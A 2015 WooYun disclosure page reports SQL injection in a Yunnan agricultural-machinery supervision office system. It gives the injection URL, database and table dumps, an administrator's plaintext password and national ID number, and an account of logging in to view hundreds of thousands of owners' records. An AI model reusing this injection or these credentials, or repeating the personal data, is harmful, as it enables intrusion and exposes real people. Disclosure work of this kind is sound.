当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143720

漏洞标题:某省级机构网上办公系统漏洞泄漏上百万信息

相关厂商:cncert国家互联网应急中心

漏洞作者: wsg00d

提交时间:2015-10-06 21:40

修复时间:2015-11-26 10:50

公开时间:2015-11-26 10:50

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-06: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

某省级机构网上办公系统sql注入泄漏大量信息,人员信息,牌证信息,考试试题。。。
中秋快乐,审核同学辛苦了,求首页,用rank砸死我,让我升级摆脱实习吧,么么哒

详细说明:

云南省农机安全监理网络办公系统
**.**.**.**/

111111111111111111111111111847.png


注入点:

**.**.**.**/wxgl/wangdian/main.php?col=%5c&dqid=1011&keyword=1&sumit=


oracle的数据库,数据很多哇

1111111111111111111111115908.png


所有数据库,当前数据库为JYNJ

available databases [4]:
[*] JYNJ
[*] SYS
[*] SYSTEM
[*] WMSYS


JYNJ数据库里有将近300个的表

Database: JYNJ
[283 tables]
+-----------------+
| ADMIN_LOG |
| BBS |
| BDSJB |
| B_RECEIVE |
| B_SEND |
| CAIWU |
| CPXHB |
| CPXHB_XGJLB |
| CWTJ |
| CYSJB |
| DEMOB |
| DQJGB |
| EXAM_KJB |
| EXAM_SJB |
| EXAM_SJ_CLASS |
| EXAM_STB |
| EXAM_ST_IMPORT |
| EXAM_TEST_KJB |
| EXAM_TEST_USER |
| EXAM_TKB |
| EXAM_USER |
| GA_DEF_SGRDYY |
| GA_DEF_WFXW |
| GA_DEF_WFXW2014 |
| GA_DXB |
| GA_SGXX |
| GA_WFB |
| GA_WFB_WS |
| GWB |
| HPK |
| HZ1 |
| HZS_BB |
| HZS_JSRB |
| HZS_NJB |
| HZS_NJ_RECORD |
| HZS_ZB |
| HZS_ZB2 |
| JGRR |
| JGRR_DETAIL |
| JHD0 |
| JHD0_DJZS |
| JHD0_HGBZ |
| JHD0_SDJY |
| JHD1 |
| JJGL |
| JJGLYB |
| JJGLYB_DETAIL |
| JJJSR |
| JLY_NSB |
| JSRGL |
| JSZB |
| JSZB_DETAIL |
| LCB |
| LSSG |
| LWSG |
| MEMBER |
| MQZX |
| MQZX1 |
| MYTEST |
| NJSG1 |
| NJSG2 |
| NJ_PC_DATA |
| NLCB |
| NNJJSY_BLB |
| NNJJSY_CJB |
| NNJJSY_CLB |
| NNJJSY_DJGZB |
| NNJJSY_HFJSZ |
| NNJJSY_HZB |
| NNJJSY_JZHXZB |
| NNJJSY_LSZLK |
| NNJJSY_TJB |
| NNJJSY_ZJB |
| NNJJSY_ZKZMB |
| NNJJSY_ZRZCB |
| NNJJSY_ZXB |
| NNJ_BGB |
| NNJ_BGBAB |
| NNJ_BHLB |
| NNJ_DJGZB |
| NNJ_DYB |
| NNJ_GSB |
| NNJ_HGBZB_1010 |
| NNJ_HGBZB_1011 |
| NNJ_HGBZB_1012 |
| NNJ_HGBZB_1013 |
| NNJ_HGBZB_1014 |
| NNJ_HGBZB_1015 |
| NNJ_HGBZB_1016 |
| NNJ_HGBZB_1017 |
| NNJ_HGBZB_1018 |
| NNJ_HGBZB_1019 |
| NNJ_HGBZB_1020 |
| NNJ_HGBZB_1021 |
| NNJ_HGBZB_1022 |
| NNJ_HGBZB_1023 |
| NNJ_HGBZB_1024 |
| NNJ_HGBZB_1025 |
| NNJ_HGBZB_1026 |
| NNJ_HGBZB_1027 |
| NNJ_HGBZB_1028 |
| NNJ_HGBZB_1029 |
| NNJ_HGBZB_1030 |
| NNJ_HGBZB_1031 |
| NNJ_HGBZB_1032 |
| NNJ_HGBZB_1033 |
| NNJ_JYKB |
| NNJ_LSHPB |
| NNJ_LSZLK |
| NNJ_WTJYB |
| NNJ_XGJLB |
| NNJ_ZCDJB |
| NNJ_ZHPK |
| NNJ_ZXB |
| NNJ_ZXK |
| NNJ_ZYDJB |
| NTLJJSY_BLB |
| NTLJJSY_CJB |
| NTLJJSY_CLB |
| NTLJJSY_DJGZB |
| NTLJJSY_HFJSZ |
| NTLJJSY_HZB |
| NTLJJSY_JSZK |
| NTLJJSY_LSZLK |
| NTLJJSY_TJB |
| NTLJJSY_WFJFB |
| NTLJJSY_XGJLB |
| NTLJJSY_ZJB |
| NTLJJSY_ZKZMB |
| NTLJJSY_ZRZCB |
| NTLJJSY_ZXB |
| NTLJJSY_ZXK |
| NTLJ_BGB |
| NTLJ_BGBAB |
| NTLJ_BHLB |
| NTLJ_DJGZB |
| NTLJ_DYB |
| NTLJ_GSB |
| NTLJ_HGBZB_1010 |
| NTLJ_HGBZB_1011 |
| NTLJ_HGBZB_1012 |
| NTLJ_HGBZB_1013 |
| NTLJ_HGBZB_1014 |
| NTLJ_HGBZB_1015 |
| NTLJ_HGBZB_1016 |
| NTLJ_HGBZB_1017 |
| NTLJ_HGBZB_1018 |
| NTLJ_HGBZB_1019 |
| NTLJ_HGBZB_1020 |
| NTLJ_HGBZB_1021 |
| NTLJ_HGBZB_1022 |
| NTLJ_HGBZB_1023 |
| NTLJ_HGBZB_1024 |
| NTLJ_HGBZB_1025 |
| NTLJ_HGBZB_1026 |
| NTLJ_HGBZB_1027 |
| NTLJ_HGBZB_1028 |
| NTLJ_HGBZB_1029 |
| NTLJ_HGBZB_1030 |
| NTLJ_HGBZB_1031 |
| NTLJ_HGBZB_1032 |
| NTLJ_HGBZB_1033 |
| NTLJ_JSZ_LSHB |
| NTLJ_JYKB |
| NTLJ_LSHPB |
| NTLJ_LSZLK |
| NTLJ_WTJYB |
| NTLJ_XGJLB |
| NTLJ_ZCDJB |
| NTLJ_ZHPK |
| NTLJ_ZXB |
| NTLJ_ZXK |
| NTLJ_ZYDJB |
| PAT_TWB |
| PAT_ZB |
| PC_ALL |
| PC_DATA |
| PC_T |
| PRINT_COUNT |
| PX_JGB |
| PX_RECORD |
| PZ_COUNT |
| QXB |
| QYZLK |
| RWD |
| SDJY_BADJB |
| SDJY_BGB |
| SDJY_BHLB |
| SDJY_CPXHB |
| SDJY_DJGZB |
| SDJY_HGBZB_1010 |
| SDJY_HGBZB_1011 |
| SDJY_HGBZB_1012 |
| SDJY_HGBZB_1013 |
| SDJY_HGBZB_1014 |
| SDJY_HGBZB_1015 |
| SDJY_HGBZB_1016 |
| SDJY_HGBZB_1017 |
| SDJY_HGBZB_1018 |
| SDJY_HGBZB_1019 |
| SDJY_HGBZB_1020 |
| SDJY_HGBZB_1021 |
| SDJY_HGBZB_1022 |
| SDJY_HGBZB_1023 |
| SDJY_HGBZB_1024 |
| SDJY_HGBZB_1025 |
| SDJY_HGBZB_1026 |
| SDJY_HPHM_LSHB |
| SDJY_NLCB |
| SDJY_XGJLB |
| SDJY_ZHPK |
| SDJY_ZXB |
| SDJY_ZXK |
| SDJY_ZYDJB |
| SGJJSRPZ |
| SGJJSRPZ_DETAIL |
| SGJPZDZ |
| SGJPZDZ_DETAIL |
| SG_DCBGS |
| SG_DJB |
| SG_DSRCSCL |
| SG_DYWPQD |
| SG_FHJL |
| SG_JYWTS |
| SG_KCBL |
| SG_KCZP |
| SG_KYJDS |
| SG_LSHB |
| SG_QJF |
| SG_RDS |
| SG_SGXX |
| SG_STCL |
| SG_TJSQS |
| SG_TJZJS |
| SG_WTS |
| SG_XCT |
| SG_XWBL |
| SG_ZJDJBCQD |
| TABLE_DLSGYBB3 |
| TABLE_JCQKB4 |
| TABLE_JLRYHZB7 |
| TABLE_JSRDJB6 |
| TABLE_JSZBHZB8 |
| TABLE_JXSGYB2 |
| TABLE_XCJY |
| TABLE_YBB |
| TABLE_ZLQKTJB5 |
| TEST |
| TJ_JSYB |
| TJ_JSZBB |
| TJ_NJSGQKB |
| TJ_NJSGYBB |
| TJ_NYJXB |
| TJ_RYQKB |
| TJ_XSGB |
| TLJJSRPZ |
| TLJJSRPZ_DETAIL |
| TLJPZDZ |
| TLJPZDZ_DETAIL |
| USERT |
| WFJF_EXAM |
| WX_BGB |
| WX_CSB |
| WX_HZB |
| WX_LSB |
| WX_MQZX |
| WX_NBB |
| WX_NLCB |
| WX_USER |
| WX_XGJLB |
| WX_YHYWFWB |
| WX_ZB |
| WZLCB |
| WZZZDW |
| YHB |
| YHB_XGJLB |
| YHYWFWB |
| YH_YWJLB |
| YWZZK |
| ZJGL_DFB |
| ZJGL_JKB |
| ZJGL_XGJL |
| NTLJJSY_HFJSZ |
+-----------------+


部分信息

3333333333333333333337120334.png


444444444444444444420448.png


漏洞证明:

找到几个系统管理员的帐号,

select * from JYNJ.USERT [5]:
[*] 1, , , , 2, 28, , , , , , a123456, , , 10, mojian, , , ,
[*] 1, , , 1986-11-24 00:00:00, 1, 29, , , , 汉族, mojian, a123456, 7, 321084198611240038, 10, mojian, 1, 本科, G, 0
[*] 0, , , , 2, 30, , , , , , 123456, , , 102710, dzxqan, , , ,
[*] 0, , , , 2, 31, , , , , , 123456, , , 102710, 50124447, , , ,
[*] 1, , , , 2, 32, , , , , , 123456, , , 10, 123456, , , ,


使用帐号mojian和密码a123456成功登录系统

555555555555555555555520810.png


大量各种信息啊,这个帐号还是系统管理员

QQ图片20150927121034.jpg


考试系统管理,大量试题以及考生信息

66666666666666666666666621350.png


队伍管理,1000个办公人员详细信息泄漏

777777777777777777777121647.png


8888888888888888888888888937.png


9999999999999999999999110.png


等等。。
还有其它很多东西,退出,重新使用mojian这个帐号登录公安交管,

bbbbbbbbbbbbbbbbbbbbbb40.png


33万的拖拉机主信息,住址姓名车牌

cccccccccccccccccccccccccccccc2909.png


这边又是40万的信息

dddddddddddddddddddddddddddd2.png


zzzzzzzzzzzzzzzzzzzzzzzz23624.png


同样也可以使用mojian登录其它分支

修复方案:

其它一些小问题,php探针。,。
**.**.**.**/php.php

版权声明:转载请注明来源 wsg00d@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-12 10:49

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评价

  1. 2015-10-07 11:40 | wsg00d ( 普通白帽子 | Rank:162 漏洞数:18 | 人丑就要多读书)

    额,这算的是大厂商还是小厂商啊,这么多信息,求大厂商啊,@疯狗 @浩天